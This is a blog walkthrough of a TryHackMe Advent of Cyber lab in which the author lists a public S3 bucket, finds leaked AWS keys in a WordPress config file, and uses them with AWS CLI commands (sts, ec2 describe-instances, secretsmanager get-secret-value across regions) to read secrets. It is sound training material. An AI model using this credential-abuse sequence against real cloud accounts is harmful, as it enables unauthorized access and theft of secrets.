AoC3#17: Elf Leaks CTF

With my recent Elf OSINT post written, its time to tackle the Advent of Cyber’s 17th day challenge – Elf Leaks. This one is all about accessing Cloud data, namely AWS.

This challenge starts with pages of good intel about cloud services, AWS, buckets, S3 and so much more.

With AWS buckets, it’s important to know how to access them via the AWS CLI without any credentials. To do that append –no-sign-request to the end of the query.

TryHackMe suggests some good AWS reconnaissance techniques:

Finding the Account ID belonging to an access key:

aws sts get-access-key-info --access-key-id AKIAEXAMPLE

Determining the Username the access key you’re using belongs to

aws sts get-caller-identity --profile PROFILENAME

Listing all the EC2 instances running in an account

aws ec2 describe-instances --output text --profile PROFILENAME

Listing all the EC2 instances running in an account in a different region

aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME

AWS Buckets

Examining the suggested image in Firefox developer panel gives up the name of the bucket used to host the file, so that was nice and easy.

To grab the flag, I first wanted to see all the files available.

$ wget http://s3.amazonaws.com/images.bestfestivalcompany.com/ 
        
--2012-12-29 07:19:49--  http://s3.amazonaws.com/images.bestfestivalcompany.com/
Resolving s3.amazonaws.com (s3.amazonaws.com)... 52.217.204.248
Connecting to s3.amazonaws.com (s3.amazonaws.com)|52.217.204.248|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/xml]
Saving to: ‘index.html’

index.html                    [ <=>                                  ]   2.08K  --.-KB/s    in 0.003s  

2012-12-29 07:19:49 (611 KB/s) - ‘index.html’ saved [2128]

This gave me an XML file containing all the AWS bucket files. I dumped the contents into mousepad and did a quick regex to parse the data nicer:

This listed the target file; which meant I could perform another simple CURL request to grab the flag. (Visiting it in the browser would equally have worked)

Now that I had the list of all the files, the other file that looks interesting is easy to spot.

I grabbed that file using a standard CURL command. After unzipping it, the first file I checked contained the solutions:


/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', 'images.best...company.com');
define('S3_UPLOADS_KEY', 'AKIAQI...CPZXFYAOI');
define('S3_UPLOADS_SECRET', 'Y+2fQBoJ...F5kWE0ZX03n/KcYxkS1Qmc');
define('S3_UPLOADS_REGION', 'us-east-1');  

To grab the username and access key, I downloaded the AWSCLI utility to my kali box.

I had to run aws configure first, dropping in the stolen credentials listed above.

I then could run the following:

$ aws sts get-access-key-info --access-key-id AKIAQI...CPZXFYAOI

… and…

$ aws sts get-caller-identity

{
"UserId": "AIDAQI...3E73BO",
"Account": "019...476",
"Arn": "arn:aws:iam::0191...476:user/xxxx@bfc.com"
}

… and…

$ aws ec2 describe-instances

Those three commands threw up the answers to most of the CTF challenge questions.

To get the database password from the secrets manager took a bit of research and fiddling.

First off I requested all the secrets:

$ aws secretsmanager list-secrets

Then after a lot of head scratching I noticed that there are more secrets stored in different regions. Specifying –region xx-xx-xx gave up some more secrets.

I thought I’d found it, but when issuing the following command I received a great response:

$ aws secretsmanager get-secret-value --secret-id {secretname}                                   

{
    "ARN": "arn:aws:secretsmanager:us-east-1:0191...476:secret:HR-Password-8AkWYF",
    "Name": "{secretname}",
    "VersionId": "70630b3c-...-18445bd808b1",
    "SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
    "VersionStages": [
        "AWSCURRENT"
    ],
    "CreatedDate": 1637717347.718
}

After some more changes to the region, I finally grabbed the flag.

This CTF challenge day showed me a lot about the AWS bucket infrastructre and taught me a bunch of useful AWS CLI commands.

TryHackMe’s day 18 of Advent of Cyber has now been written up.

Leave a Reply

Your email address will not be published. Required fields are marked *